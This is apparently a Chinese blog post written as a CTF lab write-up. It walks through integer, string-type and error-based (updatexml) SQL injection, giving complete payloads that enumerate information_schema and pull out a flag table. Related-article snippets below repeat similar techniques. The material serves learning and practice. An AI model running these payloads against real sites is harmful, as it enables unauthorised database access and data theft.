sql注入(整型、字符型、报错)

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量439 收藏 2
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xiiaogu/article/details/134323009
版权

一、整型注入

1.从1开始输入数字判断字段数,输入3时报错,说明只有两个字段。

2.将1改为-1,输入-1 union select 1,2 ,观察到Data发生变化,因此显示位是Data。

3.接着查询数据库名,输入

-1 union select 1,group_concat(schema_name) from information_schema.schemata查出数据库名为sqli。

4.接着查询数据库表名,输入

-1 union select 1,group_concat(table_name)  from information_schema.tables where table_schema='sqli'查出数据库表名为flag。

5.在flag表中查询查询字段名,输入

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'查出字段flag。

6.查询字段值,输入

-1 union select 1,group_concat(flag) from flag得到flag。

二、字符型注入

1.从1'开始输入数字判断字段数,输入3时报错,说明只有两个字段。

2.输入-1’ union select 1,2#判断出显示位为Data。

3.查询数据库名,输入-1’ union select 1,database()#获得库名sqli。

4.查询数据库表名,输入

-1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘sqli’#获得表名flag。

5.查询表的字段名,输入

-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘flag’#获得表的字段名flag。

6.查询flag的字段值,输入-1’ union select 1,flag from sqli.flag#得到flag。

三、报错注入

1.判断字段数,输入3时报错,说明只有两个字段。

2.利用updatexml(),把中间路径改为想要获取的数据库名,输入-1 and updatexml(1,concat(1,database()),2)得到数据库名称为sqli。

3.查询表名,输入-1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema =‘sqli’))),2)得到flag表。

4.查询字段名,输入-1 and updatexml(1,(concat(1,(select group_concat(column_name) from information_schema.columns where table_name =‘flag’))),2)得到字段名flag。

5.查询字段值,输入-1 and updatexml(1,(concat(1,(select flag from sqli.flag))),2)得到flag。

Xiiaogu
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL 整数形注入
MZa1213123的博客
03-02 2650
CTFHub SQL 整数注入 先 and 1=1 有回显 接着 and 1=2 无回显也就误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
浅谈SQL注入--当union遇上ntext数据类
langhunld的专栏
04-24 3661
      在我们进行sql注入的过程中常常会用到union查询方法,大多数情况下使用union查询法可以让我们很快的知道目标的数据组织方式。然而当我们遇到ntext、text或image数据类时,union查询就不太管用了。以sql server为例,在这种情况下会抛出如下误:ntext 数据类不能选为 DISTINCT,因为它不可比。     这里,我以sql server数据库为测试环
CTFHub | 整数注入
尼泊罗河伯的博客
10-25 2482
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。那么使用' and 1 = 1 ‘和' and 1 = 2’进行判断,此题存在 SQL 整数漏洞注入。那么第一步先判断字段数量,然后检查数据库位置,知道数据库位置后查看数据库版本和数据库名。接着查看一下全部数据库名,并查看这些数据库的表名,发现一个表名为 flag 比较可疑。查看这个表名的全部字段后接着查看表中的数据得到此题 flag 。
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 895
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入
SQL注入基础
菜鸟的学习笔记
12-25 519
SQL注入基础 SQL注入: 指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是可被攻击者构造的,并且参数代入了数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。 PS:在前端传入数据代入数据,增删改查操作。 以PHP语句为例: $query = "select * from users where id = $_GET[id]"; 4.1.3 MySQLSQL注入漏洞相关的知识点 在MySQL5.0版本以后,MySQL默认在数据...
CTFHUB-SQL注入-整数注入(一)
sev1n的博客
03-01 2236
后端SQL查询语句拼接了前端传递的参数,前端输入恶意的字符,打断了原有sql语句,实现了恶意的查询结果学的不够深入,理解的不够透彻,还是看了一些题解还是需要多练多学多看1.知识点整数注入(1)检查是否存在注入and 1=1 返回正确and 1=2 返回误(2)猜字段数order by x(x为数字)得出字段数(3)爆数据库名?得到数据库名称sqli(4)爆表名?得到表名 news,flag(5)爆列名?得到字段名flag(6)爆字段内容(flag)?
sql语句使用总结
anyeqingfenghua的博客
04-28 496
一.SQL介绍。 sql语句是方便我们和数据库进行交流的,我们可以通过sql语句对数据库的数据进行crud操作,这就像我们之前的io,java代码也是这种道理,我们通过Java的io输出流操作将数据输出到对应的存储文件中,也能将通过io输入流操作将数据输入到内存中,这样我们就能达到对数据的操作,其实读取使用sql读取数据依旧使用的是io流操作,由于io是在磁盘上操作,所以一般时间比较长,性能较低,如果对于请求量过大,这种直接操作数据库就性能很低,后续我们通常使用内存数据库,如redis、...
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
Python sql注入 过滤字符串的非法字符实例
09-17
主要介绍了Python sql注入 过滤字符串的非法字符实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
sql无效字符 执行sql语句解决方案
09-10
预编译语句(PreparedStatement)是用于多次执行相同或相似SQL语句的方式,它们能提高效率并防止SQL注入攻击。 当使用Java的PreparedStatement对象执行SQL时,例如: ```java String sql="INSERT INTO ASE_SYSTEM_...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入各类 讲解及利用 (一)
热门推荐
lendq的Blog
05-07 1万+
简介: SQL注入漏洞产生的原因 SQL Injection 程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患 用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作 SQL语句 Structured Query Language 结构化的查询语言,是关系数据库通讯的标准语言。 查询:SELECT st...
MSSQL注入
秋水的博客
09-04 8955
MSSQL数据库 数据库简介 MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系数据库 注入简介 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路 ...
SQL注入题中学习sql注入(1)
m0_51994984的博客
04-06 185
原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 整数注入 题目链接:http://challenge-09fcc805e44cf9a9.sandbox.ctfhub.com:10080/ 打开题目发现如下: 首先检测注入点,f分别输入1,1‘,1",基本确定是整数注入, 使用ord
SQL注入(整形)
weixin_43695031的博客
11-08 1205
1、判断为字符还是整 ?id=1 and 1=2 输入后,说明是整形 2、看显示位 ?id=-1 union all select 1,2,3 改成-1后才能执行后面的语句,显示位是2,3 3、暴库名 ?id=-1 union all select 1,database(),3 4、暴表名 ?id=-1 union all select 1,2,group_concat(table_nam...
SQL注入中的整注入实验
weixin_30525825的博客
04-09 300
首先搭建一个用于注入的环境 目录结构 conn.php    用来连接数据库的文件PHP文件 index.php    用来执行SQL命令,以及返回查询结构 index.html 一个存在注入点的页面 conn.php的代码 <?php $servername="localhost"; $username="root"; $password="...
ctfhub之SQL整数注入(借助sqlmap工具)
hwy2506451901的博客
04-05 1000
关于这道题呢,我还没有看到用sqlmap工具解答的,正好刚刚做完,感觉还挺简单的,所以决定分享一下过程,大佬可以绕过啦嘿嘿嘿,大家也可以去下载一个试试这个工具,希望能有一点帮助吧! 我们启动环境,进入网址看到让我们输入一个1试试,那我们就输入试试吧 可以看到我们输入的id写在了地址栏当中,说明采用的提交方式是get,下面就详细介绍这道题采用sqlmap的解法: 1.检查是否存在漏洞: 将地址栏的...
SQL注入之数字注入实战案例详解
weixin_39096432的博客
12-15 1423
SQL注入之数字注入实战案例详解 ———— 97℃oldboy SQL注入种类多种多样,此文将通过一个实例详细讲解数字注入。 在我们拿到一个网页时,首先判断它是否存在注入漏洞最简单粗暴的方法就是在参数后面加一个单引号,如果网页,那么说明有可能存在注入漏洞了。请看下面的网页操作: 上面是一个正常的网页,我们先检测网页是否有参数,在网址后面加上:?id=1 即http://192.168.114.147/sqli-labs-master/Less

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值